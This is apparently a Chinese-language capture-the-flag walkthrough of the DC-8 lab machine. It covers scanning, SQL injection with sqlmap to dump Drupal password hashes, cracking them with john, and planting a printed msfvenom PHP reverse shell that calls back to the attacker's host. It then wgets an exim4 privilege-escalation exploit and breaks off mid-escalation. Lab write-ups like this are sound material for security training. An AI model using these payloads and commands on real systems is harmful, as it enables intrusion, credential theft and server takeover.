DC-8
1.主机发现
使用Nmap进行ping扫描,根据已知mac地址获取ip地址。
Nmap -sP 192.168.43.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:30 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.43.1
Host is up (0.0049s latency).
MAC Address: EC:D0:9F:84:6C:D1 (Xiaomi Communications)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.0010s latency).
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Nmap scan report for ToolsScannerKali20201 (192.168.43.193)
Host is up (0.0050s latency).
MAC Address: 00:0C:29:D4:89:D8 (VMware)
Nmap scan report for LAPTOP-Q7VIH3TM (192.168.43.2)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.89 seconds
2.信息收集
端口扫描
Nmap 进行端口扫描
C:\Users\ASUS>Nmap 192.168.43.18 -A -p- -oN nmap.A
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-15 16:36 ?D1ú±ê×?ê±??
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.13% done; ETC: 16:37 (0:00:01 remaining)
Nmap scan report for dc-8 (192.168.43.18)
Host is up (0.000094s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
| 256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_ 256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open http Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:7F:AC:13 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.09 ms dc-8 (192.168.43.18)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.28 seconds
访问web页面
指纹查询
whatweb http://192.168.43.18
目录扫描
dirb http://192.168.43.18
访问防爬文件
http://192.168.43.18/robots.txt
发现后台登录界面
发现存在报错注入点
3.漏洞利用
sqlmap注入
列库名
sqlmap -u http://192.168.43.18/?nid=0%27 --dbs
列表名
sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db --tables
列字段名
sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users --columns
列字段内容
sqlmap -u http://192.168.43.18/?nid=0%27 -D d7db -T users -C "uid,name,pass" --dump
john爆破密码
张密 john:turtle
登陆web后台
找写利用点
content 》》contcat us WEBFROMS 》》 Components WEBFORM 》》 Form settings
MSF生成phpshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.php
kali@ToolsScannerKali20201:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 R > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1115 bytes
kali@ToolsScannerKali20201:~$ cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.43.193'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();kali@ToolsScakali@ToolsScannerKali20201:~$
粘贴phpshell并执行
MSF开启监听
kali@ToolsScannerKali20201:~$ msfconsole
[!] The following modules could not be loaded!..-
[!] /usr/share/metasploit-framework/modules/exploits/windows/iis/cve-2017-7269.rb
[!] Please see /home/kali/.msf4/logs/framework.log for details.
______________________________________________________________________________
| |
| 3Kom SuperHack II Logon |
|______________________________________________________________________________|
| |
| |
| |
| User Name: [ security ] |
| |
| Password: [ ] |
| |
| |
| |
| [ OK ] |
|______________________________________________________________________________|
| |
| https://metasploit.com |
|______________________________________________________________________________|
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: After running db_nmap, be sure to check out the result of hosts and services
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.43.193
LHOST => 192.168.43.193
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.193:4444
[*] Sending stage (38288 bytes) to 192.168.43.18
[*] Meterpreter session 1 opened (192.168.43.193:4444 -> 192.168.43.18:44810) at 2020-10-15 07:36:25 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter >
返回Contact Us界面提交任意内容
4.提权
交互式shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
find查询带有suid权限的命令
www-data@dc-8:/$ find / -perm /4000 2>dev/null
find / -perm /4000 2>dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
查询exim4版本
使用exim4提权需要拥有写权限,tmp目录下写文件。
searchsploit搜索exim4已知漏洞
searchsploit exim
选择本地提权漏洞exp
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp
python -m SimpleHTTPServer
靶机wget下载本地提权exp
cd /tmp
wget http://192.168.43.193:8000/46996.sh
ls -l
chmod +x 46996.sh
出错了
这个错误dc-5出现过。DC-5
set ff=unix 使windows的代码可以在unix上运行
更改后从新下载一次
没有提权成功
查看脚本
脚本中有两种执行方法尝试第二种
./46996.sh -m netcat